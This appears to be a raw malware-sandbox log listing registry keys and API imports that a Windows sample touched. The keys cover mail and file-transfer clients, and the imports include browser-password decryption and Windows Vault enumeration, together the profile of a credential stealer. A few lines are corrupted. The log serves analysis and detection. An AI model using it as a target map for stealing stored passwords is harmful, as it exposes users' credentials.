HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\60.5.0 (en-US)\Main\Install Directory
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x41e\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x45c\xfffd\xfffd\x41b\xfffd\xfffd\xfffd\x42f\xfffd\xfffd\xfffd\xfffd\x419\xfffd\xfffd\x44f\xfffd\xfffd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ObjectName
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
\x8ad0\x224EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\75.0 (x86 en-GB)\Main\Install Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\60.5.0 (en-US)\Main\Install Directory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioSrv\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AeLookupSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AudioEndpointBuilder\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PolicyAgent\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ObjectName
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernelbase.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.ProcessIdToSessionId
imm32.dll.ImmCreateContext
imm32.dll.ImmDestroyContext
imm32.dll.ImmNotifyIME
imm32.dll.ImmAssociateContext
imm32.dll.ImmReleaseContext
imm32.dll.ImmGetContext
imm32.dll.ImmGetCompositionStringA
imm32.dll.ImmSetCompositionStringA
imm32.dll.ImmGetCompositionStringW
imm32.dll.ImmSetCompositionStringW
imm32.dll.ImmSetCandidateWindow
kernel32.dll.GetDiskFreeSpaceExA
oleaut32.dll.VariantChangeTypeEx
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarAdd
oleaut32.dll.VarSub
oleaut32.dll.VarMul
oleaut32.dll.VarDiv
oleaut32.dll.VarIdiv
oleaut32.dll.VarMod
oleaut32.dll.VarAnd
oleaut32.dll.VarOr
oleaut32.dll.VarXor
oleaut32.dll.VarCmp
oleaut32.dll.VarI4FromStr
oleaut32.dll.VarR4FromStr
oleaut32.dll.VarR8FromStr
oleaut32.dll.VarDateFromStr
oleaut32.dll.VarCyFromStr
oleaut32.dll.VarBoolFromStr
oleaut32.dll.VarBstrFromCy
oleaut32.dll.VarBstrFromDate
oleaut32.dll.VarBstrFromBool
user32.dll.GetMonitorInfoA
user32.dll.GetSystemMetrics
user32.dll.EnumDisplayMonitors
user32.dll.AnimateWindow
comctl32.dll.InitializeFlatSB
comctl32.dll.UninitializeFlatSB
comctl32.dll.FlatSB_GetScrollProp
comctl32.dll.FlatSB_SetScrollProp
comctl32.dll.FlatSB_EnableScrollBar
comctl32.dll.FlatSB_ShowScrollBar
comctl32.dll.FlatSB_GetScrollRange
comctl32.dll.FlatSB_GetScrollInfo
comctl32.dll.FlatSB_GetScrollPos
comctl32.dll.FlatSB_SetScrollPos
comctl32.dll.FlatSB_SetScrollInfo
comctl32.dll.FlatSB_SetScrollRange
user32.dll.SetLayeredWindowAttributes
kernel32.dll.FileTimeToSystemTime
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptReleaseContext
nss3.dll.NSS_Init
nss3.dll.NSS_Shutdown
nss3.dll.PK11_GetInternalKeySlot
nss3.dll.PK11_FreeSlot
nss3.dll.PK11_Authenticate
nss3.dll.PK11SDR_Decrypt
nss3.dll.PK11_CheckUserPassword
nss3.dll.SECITEM_FreeItem
kernel32.dll.InitializeCriticalSectionEx
softokn3.dll.NSC_GetFunctionList
softokn3.dll.NSC_ModuleDBFunc
freebl3.dll.FREEBL_GetVector
cryptbase.dll.SystemFunction001
cryptbase.dll.SystemFunction002
cryptbase.dll.SystemFunction003
cryptbase.dll.SystemFunction004
cryptbase.dll.SystemFunction005
cryptbase.dll.SystemFunction028
cryptbase.dll.SystemFunction029
cryptbase.dll.SystemFunction034
cryptbase.dll.SystemFunction036
cryptbase.dll.SystemFunction040
cryptbase.dll.SystemFunction041
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
